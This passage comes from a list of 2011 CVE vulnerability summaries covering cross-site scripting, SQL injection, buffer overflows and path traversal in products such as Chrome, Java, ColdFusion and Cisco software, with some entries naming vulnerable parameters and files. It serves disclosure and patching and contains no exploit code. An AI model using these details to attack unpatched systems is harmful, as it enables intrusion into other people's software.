use the CRL Distribution Points (CDP) certificate extension, which might allow man-in-the-middle attackers to spoof an SSL partner via a revoked certificate for a (1) client, (2) queue manager, or (3) application. [CVE-2011-1221] Cross-zone scripting vulnerability in the RealPlayer ActiveX control in RealNetworks RealPlayer 11.0 through 11.1 and 14.0.0 through 14.0.5, RealPlayer SP 1.0 through 1.1.5, and RealPlayer Enterprise 2.0 through 2.1.5 allows remote attackers to inject arbitrary web script or HTML in the Local Zone via a local HTML document, a different vulnerability than CVE-2011-2947. [CVE-2011-1209] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.39 and 7.0 before 7.0.0.17 uses a weak WS-Security XML encryption algorithm, which makes it easier for remote attackers to obtain plaintext data from a (1) JAX-RPC or (2) JAX-WS Web Services request via unspecified vectors related to a "decryption attack." [CVE-2011-1201] The context implementation in WebKit, as used in Google Chrome before 10.0.648.127, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer." [CVE-2011-1190] The Web Workers implementation in Google Chrome before 10.0.648.127 allows remote attackers to bypass the Same Origin Policy via unspecified vectors, related to an "error message leak." [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419. [CVE-2011-1168] Cross-site scripting (XSS) vulnerability in the KHTMLPart::htmlError function in khtml/khtml_part.cpp in Konqueror in KDE SC 4.4.0 through 4.6.1 allows remote attackers to inject arbitrary web script or HTML via the URI in a URL corresponding to an unavailable web site. [CVE-2011-1158] Cross-site scripting (XSS) vulnerability in feedparser.py in Universal Feed Parser (aka feedparser or python-feedparser) 5.x before 5.0.1 allows remote attackers to inject arbitrary web script or HTML via an unexpected URI scheme, as demonstrated by a javascript: URI. [CVE-2011-1157] Cross-site scripting (XSS) vulnerability in feedparser.py in Universal Feed Parser (aka feedparser or python-feedparser) 5.x before 5.0.1 allows remote attackers to inject arbitrary web script or HTML via malformed XML comments. [CVE-2011-1129] Cross-site scripting (XSS) vulnerability in the EditNews function in ManageNews.php in Simple Machines Forum (SMF) before 1.1.13, and 2.x before 2.0 RC5, might allow remote authenticated users to inject arbitrary web script or HTML via a save_items action. [CVE-2011-1122] The WebGL implementation in Google Chrome before 9.0.597.107 allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors, aka Issue 71960. [CVE-2011-1120] The WebGL implementation in Google Chrome before 9.0.597.107 allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors, aka Issue 71717. [CVE-2011-1106] Cross-site scripting (XSS) vulnerability in stcenter.nsf in the server in IBM Lotus Sametime allows remote attackers to inject arbitrary web script or HTML via the authReasonCode parameter in an OpenDatabase action. [CVE-2011-1105] Multiple cross-site scripting (XSS) vulnerabilities in Mutare EVM allow remote attackers to inject arbitrary web script or HTML via (1) a delivery address and possibly (2) a PIN. [CVE-2011-1103] The WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to obtain sensitive information via a request to an invalid report, which reveals the installation path in an error message, as demonstrated with requests to (1) report/infection-table.html or (2) report/productsummary-table.html. [CVE-2011-1102] Cross-site scripting (XSS) vulnerability in the WebReporting module in F-Secure Policy Manager 7.x, 8.00 before hotfix 2, 8.1x before hotfix 3 on Windows and hotfix 2 on Linux, and 9.00 before hotfix 4 on Windows and hotfix 2 on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1096] The W3C XML Encryption Standard, as used in the JBoss Web Services (JBossWS) component in JBoss Enterprise Portal Platform before 5.2.2 and other products, when using block ciphers in cipher-block chaining (CBC) mode, allows remote attackers to obtain plaintext data via a chosen-ciphertext attack on SOAP responses, aka "character encoding pattern attack." [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps. [CVE-2011-1066] Cross-site scripting (XSS) vulnerability in the Messaging module 6.x-2.x before 6.x-2.4 and 6.x-4.x before 6.x-4.0-beta8 for Drupal allows remote attackers with administer messaging permissions to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-1065] Multiple stack-based buffer overflows in the PIPIWebPlayer ActiveX control (PIWebPlayer.ocx) in PIPI Player 2.8.0.0 allow remote attackers to execute arbitrary code via long arguments to the (1) PlayURL or (2) PlayURLWithLocalPlayer methods. [CVE-2011-1063] Multiple cross-site scripting (XSS) vulnerabilities in Cherry-Design Photopad 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id or (2) data[title] parameters in an edit action to files.php, or (3) id parameter in a view action to gallery.php. [CVE-2011-1062] Multiple cross-site scripting (XSS) vulnerabilities in include/html/header.php in TaskFreak! 0.6.4 allow remote attackers to inject arbitrary web script or HTML via the (1) sContext, (2) sort, (3) dir, and (4) show parameters in a save action to index.php [CVE-2011-1059] Use-after-free vulnerability in WebCore in WebKit before r77705, as used in Google Chrome before 11.0.672.2 and other products, allows user-assisted remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via vectors that entice a user to resubmit a form, related to improper handling of provisional items by the HistoryController component, aka rdar problem 8938557. [CVE-2011-1058] Cross-site scripting (XSS) vulnerability in the reStructuredText (rst) parser in parser/text_rst.py in MoinMoin before 1.9.3, when docutils is installed or when "format rst" is set, allows remote attackers to inject arbitrary web script or HTML via a javascript: URL in the refuri attribute. NOTE: some of these details are obtained from third party information. [CVE-2011-1050] Unspecified vulnerability in Hex-Rays IDA Pro 5.7 and 6.0 has unknown impact and attack vectors related to "converson of string encodings" and "inconsistencies in the handling of UTF8 sequences by the user interface." [CVE-2011-1038] Multiple cross-site scripting (XSS) vulnerabilities in stconf.nsf in the server in IBM Lotus Sametime 8.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the messageString parameter in a WebMessage action or (2) the PATH_INFO. [CVE-2011-1034] Cross-site scripting (XSS) vulnerability in the UI in IBM Rational Build Forge 7.0.2 allows remote attackers to inject arbitrary web script or HTML via the mod parameter to the fullcontrol program. NOTE: some of these details are obtained from third party information. [CVE-2011-1032] IBM Lotus Connections 3.0, when IBM WebSphere Application Server 7.0.0.11 is used, does not properly restrict access to the internal login module, which has unspecified impact and attack vectors. [CVE-2011-1030] Cross-site scripting (XSS) vulnerability in the Wikis component in IBM Lotus Connections 3.0 allows remote attackers to inject arbitrary web script or HTML via vectors related to the "Confirm New Page scene." [CVE-2011-1029] Cross-site scripting (XSS) vulnerability in IBM Rational Team Concert (RTC) 2.0.0.x allows remote authenticated users to inject arbitrary web script or HTML via the name of a shared report. [CVE-2011-1007] Best Practical Solutions RT before 3.8.9 does not perform certain redirect actions upon a login, which allows physically proximate attackers to obtain credentials by resubmitting the login form via the back button of a web browser on an unattended workstation after an RT logout. [CVE-2011-0962] Cross-site scripting (XSS) vulnerability in CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine in the Common Services Device Center in Cisco Unified Operations Manager (CUOM) before 8.6 allows remote attackers to inject arbitrary web script or HTML via the tag parameter, aka Bug ID CSCto12712. [CVE-2011-0961] Cross-site scripting (XSS) vulnerability in cwhp/device.center.do in the Help servlet in Cisco CiscoWorks Common Services 3.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the device parameter, aka Bug ID CSCto12704. [CVE-2011-0959] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Operations Manager (CUOM) before 8.6 allow remote attackers to inject arbitrary web script or HTML via (1) the extn parameter to iptm/advancedfind.do, (2) the deviceInstanceName parameter to iptm/ddv.do, the (3) cmd or (4) group parameter to iptm/eventmon, the (5) clusterName or (6) deviceName parameter to iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp, or the (7) ccmName or (8) clusterName parameter to iptm/logicalTopo.do, aka Bug ID CSCtn61716. [CVE-2011-0926] A certain ActiveX control in CSDWebInstaller.ocx in Cisco Secure Desktop (CSD) does not properly verify the signature of an unspecified downloaded program, which allows remote attackers to execute arbitrary code by spoofing the CSD installation process, a different vulnerability than CVE-2010-0589. [CVE-2011-0925] The CSDWebInstallerCtrl ActiveX control in CSDWebInstaller.ocx in Cisco Secure Desktop (CSD) allows remote attackers to download an unintended Cisco program onto a client machine, and execute this program, by identifying a Cisco program with a Cisco digital signature and then renaming this program to inst.exe, a different vulnerability than CVE-2010-0589 and CVE-2011-0926. [CVE-2011-0921] crs.exe in the Cell Manager Service in the client in HP Data Protector does not properly validate credentials associated with the hostname, domain, and username, which allows remote attackers to execute arbitrary code by sending unspecified data over TCP, related to the webreporting client, the applet domain, and the java username. [CVE-2011-0911] Cross-site scripting (XSS) vulnerability in the Users module in Zikula before 1.2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: it is possible that this overlaps CVE-2011-0535. [CVE-2011-0909] Cross-site scripting (XSS) vulnerability in Vanilla Forums before 2.0.17.6 allows remote attackers to inject arbitrary web script or HTML via the p parameter to an unspecified component, a different vulnerability than CVE-2011-0526. [CVE-2011-0908] Open redirect vulnerability in Vanilla Forums before 2.0.17.6 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the Target parameter to an unspecified component, a different vulnerability than CVE-2011-0526. [CVE-2011-0903] Multiple directory traversal vulnerabilities in AR Web Content Manager (AWCM) 2.2 allow remote attackers to read arbitrary files and possibly have other unspecified impact via a .. (dot dot) in the (1) awcm_theme or (2) awcm_lang cookie to (a) index.php or (b) header.php. [CVE-2011-0898] Cross-site scripting (XSS) vulnerability in HP Network Node Manager i (NNMi) 9.00 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0893] Cross-site scripting (XSS) vulnerability in HP Operations 9.10 on UNIX platforms allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0892] Cross-site scripting (XSS) vulnerability in HP Diagnostics 7.5x and 8.0x before 8.05.54.225 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2011-0887] The web management portal on the SMC SMCD3G-CCR (aka Comcast Business Gateway) with firmware before 1.4.0.49.2 uses predictable session IDs based on time values, which makes it easier for remote attackers to hijack sessions via a brute-force attack on the userid cookie. [CVE-2011-0871] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing. [CVE-2011-0869] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 26 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to SAAJ. [CVE-2011-0867] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking. [CVE-2011-0866] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Java Runtime Environment. [CVE-2011-0865] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to Deserialization. [CVE-2011-0864] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot. [CVE-2011-0863] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-0846] Unspecified vulnerability in the Oracle Sun Java System Access Manager Policy Agent 2.2 allows remote attackers to affect availability via unknown vectors related to Web Proxy Agent. [CVE-2011-0836] Unspecified vulnerability in Oracle JD Edwards EnterpriseOne Tools 8.9 GA through 8.98.4.1 and OneWorld Tools through 24.1.3 allows remote authenticated users to affect integrity, related to Web Runtime SEC. [CVE-2011-0817] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. [CVE-2011-0815] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to AWT. [CVE-2011-0809] Unspecified vulnerability in the Web ADI component in Oracle E-Business Suite 11.5.10.2, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote attackers to affect integrity via unknown vectors. [CVE-2011-0788] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0786. [CVE-2011-0786] Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than CVE-2011-0788. [CVE-2011-0773] Cross-site scripting (XSS) vulnerability in pivotx/modules/module_image.php in PivotX before 2.2.3 allows remote attackers to inject arbitrary web script or HTML via the image parameter. [CVE-2011-0772] Multiple cross-site scripting (XSS) vulnerabilities in PivotX 2.2.0, and possibly other versions before 2.2.2, allow remote attackers to inject arbitrary web script or HTML via the (1) color parameter to includes/blogroll.php or (2) src parameter to includes/timwrapper.php. [CVE-2011-0770] Cross-site scripting (XSS) vulnerability in Windows Event Log SmartConnector in HP ArcSight Connector Appliance before 6.1 allows remote attackers to inject arbitrary web script or HTML via the Windows XP variable in a file. [CVE-2011-0767] Cross-site scripting (XSS) vulnerability in the management GUI in the MX Management Server in Imperva SecureSphere Web Application Firewall 6.2, 7.x, and 8.x allows remote attackers to inject arbitrary web script or HTML via an HTTP request to a firewalled server, aka Bug ID 31759. [CVE-2011-0756] The application server in Trustwave WebDefend Enterprise before 5.0 uses hardcoded console credentials, which makes it easier for remote attackers to read security-event data by using the remote console GUI to connect to the management port. [CVE-2011-0751] Directory traversal vulnerability in nhttpd (aka Nostromo webserver) before 1.9.4 allows remote attackers to execute arbitrary programs or read arbitrary files via a ..%2f (encoded dot dot slash) in a URI. [CVE-2011-0741] Multiple cross-site scripting (XSS) vulnerabilities in ModX Evolution before 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) installer or (2) image editor. [CVE-2011-0740] Cross-site scripting (XSS) vulnerability in magpie/scripts/magpie_slashbox.php in RSS Feed Reader 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the rss_url parameter. [CVE-2011-0736] DISPUTED Adobe ColdFusion 9.0.1 CHF1 and earlier, when a web application is configured to use a DBMS, allows remote attackers to obtain potentially sensitive information about the database structure via an id=- query to a .cfm file. NOTE: the vendor disputes the significance of this issue because the Site-wide Error Handler and Debug Output Settings sections of the ColdFusion Lockdown guide explain the requirement for settings that prevent this information disclosure. [CVE-2011-0735] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion before 9.0.1 CHF1 allows remote attackers to inject arbitrary web script or HTML via vectors involving a "tag script." [CVE-2011-0734] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion before 9.0.1 CHF1 allows remote attackers to inject arbitrary web script or HTML via an id parameter containing a JavaScript onLoad event handler for a BODY element, related to a "tag body" attack. NOTE: this was originally reported as affecting 9.0.1 CHF1 and earlier. [CVE-2011-0733] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion before 9.0.1 CHF1 allows remote attackers to inject arbitrary web script or HTML via the User-Agent HTTP header in an id=- query to a .cfm file. [CVE-2011-0732] Multiple unspecified vulnerabilities in IBM Tivoli Integrated Portal (TIP) 1.1.1.1, as used in IBM Tivoli Common Reporting (TCR) 1.2.0 before Interim Fix 9, have unknown impact and attack vectors, related to "security vulnerabilities of Websphere Application Server bundled within" and "many internal defects and APARs." [CVE-2011-0728] Cross-site scripting (XSS) vulnerability in templatefunctions.py in Loggerhead before 1.18.1 allows remote authenticated users to inject arbitrary web script or HTML via a filename, which is not properly handled in a revision view. [CVE-2011-0725] Absolute path traversal vulnerability in the org.debian.apt.UpdateCachePartially method in worker.py in Aptdaemon 0.40 in Ubuntu 10.10 and 11.04 allows local users to read arbitrary files via a full pathname in the sources_list argument, related to the D-Bus interface. [CVE-2011-0717] Session fixation vulnerability in Red Hat Network (RHN) Satellite Server 5.4 allows remote attackers to hijack web sessions via unspecified vectors related to Spacewalk. [CVE-2011-0716] The br_multicast_add_group function in net/bridge/br_multicast.c in the Linux kernel before 2.6.38, when a certain Ethernet bridge configuration is used, allows local users to cause a denial of service (memory corruption and system crash) by sending IGMP packets to a local interface. [CVE-2011-0707] Multiple cross-site scripting (XSS) vulnerabilities in Cgi/confirm.py in GNU Mailman 2.1.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) full name or (2) username field in a confirmation message. [CVE-2011-0706] The JNLPClassLoader class in IcedTea-Web before 1.0.1, as used in OpenJDK Runtime Environment 1.6.0, allows remote attackers to gain privileges via unknown vectors related to multiple signers and the assignment of "an inappropriate security descriptor." [CVE-2011-0700] Multiple cross-site scripting (XSS) vulnerabilities in WordPress before 3.0.5 allow remote authenticated users to inject arbitrary web script or HTML via vectors related to (1) the Quick/Bulk Edit title (aka post title or post_title), (2) post_status, (3) comment_status, (4) ping_status, and (5) escaping of tags within the tags meta box. [CVE-2011-0697] Cross-site scripting (XSS) vulnerability in Django 1.1.x before 1.1.4 and 1.2.x before 1.2.5 might allow remote attackers to inject arbitrary web script or HTML via a filename associated with a file upload. [CVE-2011-0686] Unspecified vulnerability in Opera before 11.01 allows remote attackers to cause a denial of service (application crash) via unknown content on a web page, as demonstrated by vkontakte.ru. [CVE-2011-0684] Opera before 11.01 does not properly handle redirections and unspecified other HTTP responses, which allows remote web servers to obtain sufficient access to local files to use these files as page resources, and consequently obtain potentially sensitive information from the contents of the files, via an unknown response manipulation. [CVE-2011-0683] Opera before 11.01 does not properly restrict the use of opera: URLs, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site. [CVE-2011-0679] IBM WebSphere Portal 6.0.1.1 through 7.0.0.0, as used in IBM Lotus Web Content Management (WCM) and IBM Lotus Quickr for WebSphere Portal, allows remote attackers to obtain sensitive information via a "modified message." [CVE-2011-0678] Unrestricted file upload vulnerability in the EasyEdit module in Lomtec ActiveWeb Professional 3.0 allows remote attackers to execute arbitrary code by uploading an executable file via the UploadDirectory and Accepted Extensions fields in the getImagefile component of EasyEdit.cfm. [CVE-2011-0663] Multiple integer overflows in the Microsoft (1) JScript 5.6 through 5.8 and (2) VBScript 5.6 through 5.8 scripting engines allow remote attackers to execute arbitrary code via a crafted web page, aka "Scripting Memory Reallocation Vulnerability." [CVE-2011-0653] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010 Gold and SP1, and SharePoint Foundation 2010, allows remote attackers to inject arbitrary web script or HTML via the URI, aka "XSS in SharePoint Calendar Vulnerability." [CVE-2011-0641] Multiple cross-site scripting (XSS) vulnerabilities in wp-admin/admin.php in the StatPressCN plugin 1.9.0 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) what1, (2) what2, (3) what3, (4) what4, and (5) what5 parameters. NOTE: the provenance of this information is unknown [CVE-2011-0640] The default configuration of udev on Linux does not warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0639] Apple Mac OS X does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0613] Multiple cross-site scripting (XSS) vulnerabilities in RoboHelp 7 and 8, and RoboHelp Server 7 and 8, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, related to (1) wf_status.htm and (2) wf_topicfs.htm in RoboHTML/WildFireExt/TemplateStock/. [CVE-2011-0604] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0587. [CVE-2011-0587] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604. [CVE-2011-0584] Session fixation vulnerability in Adobe ColdFusion 8.0 through 9.0.1 allows remote attackers to hijack web sessions via unspecified vectors. [CVE-2011-0583] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion 8.0 through 9.0.1 allows remote attackers to inject arbitrary web script or HTML via the cfform tag. [CVE-2011-0580] Multiple cross-site scripting (XSS) vulnerabilities in the administrator console in Adobe ColdFusion 8.0 through 9.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0552] Multiple cross-site scripting (XSS) vulnerabilities in the management console in Symantec IM Manager before 8.4.18 allow remote attackers to inject arbitrary web script or HTML via the (1) refreshRateSetting parameter to IMManager/Admin/IMAdminSystemDashboard.asp, the (2) nav or (3) menuitem parameter to IMManager/Admin/IMAdminTOC_simple.asp, or the (4) action parameter to IMManager/Admin/IMAdminEdituser.asp. [CVE-2011-0549] SQL injection vulnerability in forget.php in the management GUI in Symantec Web Gateway 4.5.x allows remote attackers to execute arbitrary SQL commands via the username parameter. [CVE-2011-0531] demux/mkv/mkv.hpp in the MKV demuxer plugin in VideoLAN VLC media player 1.1.6.1 and earlier allows remote attackers to cause a denial of service (crash) and execute arbitrary commands via a crafted MKV (WebM or Matroska) file that triggers memory corruption, related to "class mismatching" and the MKV_IS_ID macro. [CVE-2011-0526] Cross-site scripting (XSS) vulnerability in index.php in Vanilla Forums before 2.0.17 allows remote attackers to inject arbitrary web script or HTML via the Target parameter in a /entry/signin action. [CVE-2011-0510] SQL injection vulnerability in cart.php in Advanced Webhost Billing System (AWBS) 2.9.2 and possibly earlier allows remote attackers to execute arbitrary SQL commands via the oid parameter in an add_other action. [CVE-2011-0509] Cross-site scripting (XSS) vulnerability in Vaadin before 6.4.9 allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to the index page. [CVE-2011-0508] Cross-site scripting (XSS) vulnerability in system/modules/comments/Comments.php in Contao CMS 2.9.2, and possibly other versions before 2.9.3, allows remote attackers to inject arbitrary web script or HTML via the HTTP X_FORWARDED_FOR header, which is stored by system/libraries/Environment.php but not properly handled by a comments action to main.php. [CVE-2011-0504] Multiple cross-site scripting (XSS) vulnerabilities in VaM Shop 1.6, 1.6.1, and probably earlier versions llow remote attackers to inject arbitrary web script or HTML via the (1) status parameter to admin/orders.php, (2) search parameter to admin/customers.php, or (3) STORE_NAME parameter to admin/configuration.php. [CVE-2011-0496] Unspecified vulnerability in Sybase EAServer 5.x and 6.x before 6.3 ESD#2, as used in Appeon, Replication Server Messaging Edition (RSME), and WorkSpace, allows remote attackers to install arbitrary web services and execute arbitrary code, related to a "design vulnerability." [CVE-2011-0494] Directory traversal vulnerability in WebSEAL in IBM Tivoli Access Manager for e-business 5.1 before 5.1.0.39-TIV-AWS-IF0040, 6.0 before 6.0.0.25-TIV-AWS-IF0026, 6.1.0 before 6.1.0.5-TIV-AWS-IF0006, and 6.1.1 before 6.1.1-TIV-AWS-FP0001 has unspecified impact and attack vectors. NOTE: this might overlap CVE-2010-4622. [CVE-2011-0488] Stack-based buffer overflow in NTWebServer.exe in the test web service in InduSoft NTWebServer, as distributed in Advantech Studio 6.1 and InduSoft Web Studio 7.0, allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long request to TCP port 80. [CVE-2011-0486] Cross-site scripting (XSS) vulnerability in cognos.cgi in IBM Cognos 8 Business Intelligence (BI) 8.4.1 before FP1 allows remote attackers to inject arbitrary web script or HTML via the pathinfo parameter. [CVE-2011-0480] Multiple buffer overflows in vorbis_dec.c in the Vorbis decoder in FFmpeg, as used in Google Chrome before 8.0.552.237 and Chrome OS before 8.0.552.344, allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact via a crafted WebM file, related to buffers for (1) the channel floor and (2) the channel residue. [CVE-2011-0462] Multiple cross-site scripting (XSS) vulnerabilities in the login page in the webui component in SUSE openSUSE Build Service (OBS) before 2.1.6 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0459] Cross-site scripting (XSS) vulnerability in Cyber-Ark Password Vault Web Access (PVWA) 5.0 and earlier, 5.5 through 5.5 patch 4, and 6.0 through 6.0 patch 2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0457] Cross-site scripting (XSS) vulnerability in e107 0.7.22 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0456] webscript.pl in Open Ticket Request System (OTRS) 2.3.4 and earlier allows remote attackers to execute arbitrary commands via unspecified vectors, related to a "command injection vulnerability." [CVE-2011-0455] Cross-site scripting (XSS) vulnerability in Things BBS before 2.0.3 and BBS Thread before 2.0.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0451] Multiple cross-site scripting (XSS) vulnerabilities in (1) data/Smarty/templates/default/list.tpl and (2) data/Smarty/templates/default/campaign/bloc/cart_tag.tpl in EC-CUBE before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-0450] The downloads manager in Opera before 11.01 on Windows does not properly determine the pathname of the filesystem-viewing application, which allows user-assisted remote attackers to execute arbitrary code via a crafted web site that hosts an executable file. [CVE-2011-0446] Multiple cross-site scripting (XSS) vulnerabilities in the mail_to helper in Ruby on Rails before 2.3.11, and 3.x before 3.0.4, when javascript encoding is used, allow remote attackers to inject arbitrary web script or HTML via a crafted (1) name or (2) email value. [CVE-2011-0439] Cross-site scripting (XSS) vulnerability in Mahara 1.2.x before 1.2.7 and 1.3.x before 1.3.4 allows remote attackers to inject arbitrary web script or HTML via the Pieforms select box. [CVE-2011-0432] Multiple SQL injection vulnerabilities in the get_userinfo method in the MySQLAuthHandler class in DAVServer/mysqlauth.py in PyWebDAV before 0.9.4.1 allow remote attackers to execute arbitrary SQL commands via the (1) user or (2) pw argument. NOTE: some of these details are obtained from third party information. [CVE-2011-0399] Piwik before 1.1 does not prevent the rendering of the login form inside a frame in a third-party HTML document, which makes it easier for remote attackers to conduct clickjacking attacks via a crafted web site. [CVE-2011-0392] Cisco TelePresence Recording Server devices with software 1.6.x do not require authentication for an XML-RPC interface, which allows remote attackers to perform unspecified actions via a session on TCP port 8080, aka Bug ID CSCtg35833. [CVE-2011-0381] Cisco TelePresence Manager 1.2.x through 1.6.x allows remote attackers to perform unspecified actions and consequently execute arbitrary code via a crafted request to the Java RMI interface, related to a "command injection vulnerability," aka Bug ID CSCtf97085. [CVE-2011-0364] The Management Console (webagent.exe) in Cisco Security Agent 5.1, 5.2, and 6.0 before 6.0.2.145 allows remote attackers to create arbitrary files and execute arbitrary code via unspecified parameters in a crafted st_upload request. [CVE-2011-0346] Use-after-free vulnerability in the ReleaseInterface function in MSHTML.DLL in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the DOM implementation and the BreakAASpecial and BreakCircularMemoryReferences functions, as demonstrated by cross_fuzz, aka "MSHTML Memory Corruption Vulnerability." [CVE-2011-0342] Multiple buffer overflows in the InduSoft ISSymbol ActiveX control in ISSymbol.ocx 301.1104.601.0 in InduSoft Web Studio 7.0B2 hotfix 7.0.01.04 allow remote attackers to execute arbitrary code via a long parameter to the (1) Open, (2) Close, or (3) SetCurrentLanguage method. [CVE-2011-0341] Stack-based buffer overflow in the pdfmoz_onmouse function in apps/mozilla/moz_main.c in the MuPDF plug-in 2008.09.02 for Firefox allows remote attackers to execute arbitrary code via a crafted web site. [CVE-2011-0340] Multiple buffer overflows in the ISSymbol ActiveX control in ISSymbol.ocx 61.6.0.0 and 301.1009.2904.0 in the ISSymbol virtual machine, as distributed in Advantech Studio 6.1 SP6 61.6.01.05, InduSoft Web Studio before 7.0+SP1, and InduSoft 